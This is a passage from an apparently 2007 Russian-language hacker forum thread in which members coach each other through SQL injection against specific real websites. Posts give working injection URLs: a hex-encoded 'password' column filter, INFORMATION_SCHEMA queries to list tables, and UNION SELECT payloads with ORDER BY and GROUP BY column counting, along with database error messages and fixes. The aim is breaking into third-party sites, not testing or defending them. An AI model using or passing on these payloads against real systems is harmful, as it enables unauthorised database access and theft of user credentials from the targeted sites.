28.11.2007, 21:47
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
Сообщение от Mike 007
а +where+co lumn_name=0x70617373776F7264+--+ откуда?
Это hex представление столбца password
|
|
|
29.11.2007, 08:01
|
|
Новичок
Регистрация: 28.11.2007
Сообщений: 1
С нами:
9712139
Репутация:
0
|
|
Код:
http://terminovo.com/index.php?main_page=products_general_i nfo &products_id=99999999
Фильтруются отдельные символы и буквы, через hex,char ничего не выходит.
Последний раз редактировалось 77oody; 29.11.2007 в 08:03..
|
|
|
|
29.11.2007, 10:37
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Фильтруются отдельные символы и буквы, через hex,char ничего не выходит.
При чем здесь хекс или char? Там же инклуд(и то маловероятно что провернешь), а не скуля
|
|
|
|
30.11.2007, 09:04
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами:
10660753
Репутация:
676
|
|
noneim
имена таблиц похоже только методом тыка..
можно и не методом тыка 
http://www.millikin.edu/athletics/archives_sport.asp?SPORT=(SELECT%20TOP%201%20TABLE _SCHEMA%20FROM%20INFORMATION_SCHEMA.TABLES)
дальше наверно сам разберешся... 
на всякий случай прочитай:
https://forum.antichat.ru/showthread.php?t=30501
|
|
|
|
30.11.2007, 21:53
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
С нами:
10126406
Репутация:
206
|
|
http://www.filmoscope.ru/?id=99999999
помогите подобрать таблицы, до 50 подобрал не получаеться
|
|
|
|
30.11.2007, 22:04
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
С нами:
10143707
Репутация:
114
|
|
Сообщение от SVAROG
http://www.filmoscope.ru/?id=99999999
помогите подобрать таблицы, до 50 подобрал не получаеться
http://www.filmoscope.ru/?id=1000000000+union+select+1,2,3,4,5,6,7,8,9/*
пользуйся "order by"
|
|
|
|
30.11.2007, 22:27
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
С нами:
10216668
Репутация:
930
|
|
Или 'group by' )
И еще не путай количество полей с таблицами
|
|
|
|
02.12.2007, 20:27
|
|
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
С нами:
10080326
Репутация:
576
|
|
Узнаю через order+by число столбцов,их 4
Код:
http://www.4ips.biz/products.php?id=7+order+by+4/*
но при запросе +union+select
Код:
http://www.4ips.biz/products.php?id=7+union+select+1,2,3,4/*
The used SELECT statements have a different number of columns
Что это значит и что делать? |
|
|
|
03.12.2007, 10:55
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Что это значит и что делать?
Это значит, что ты неправильно подобрал количество полей, попробуй подобрать через group by, либо вручную по очереди через union select
|
|
|
|
03.12.2007, 11:48
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от 0nep@t0p
Это значит, что ты неправильно подобрал количество полей, попробуй подобрать через group by, либо вручную по очереди через union select
Совсем не факт, зачем говорить если не знаешь, эту ситуювину я описывал здесь:
http://forum.antichat.ru/showpost.php?p=497033&postcount=21
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
![Аватар для [aywo]](/avatars/avatar32504.jpg?517617){kind=avatar}
Похожие темы
Комбинированный вид
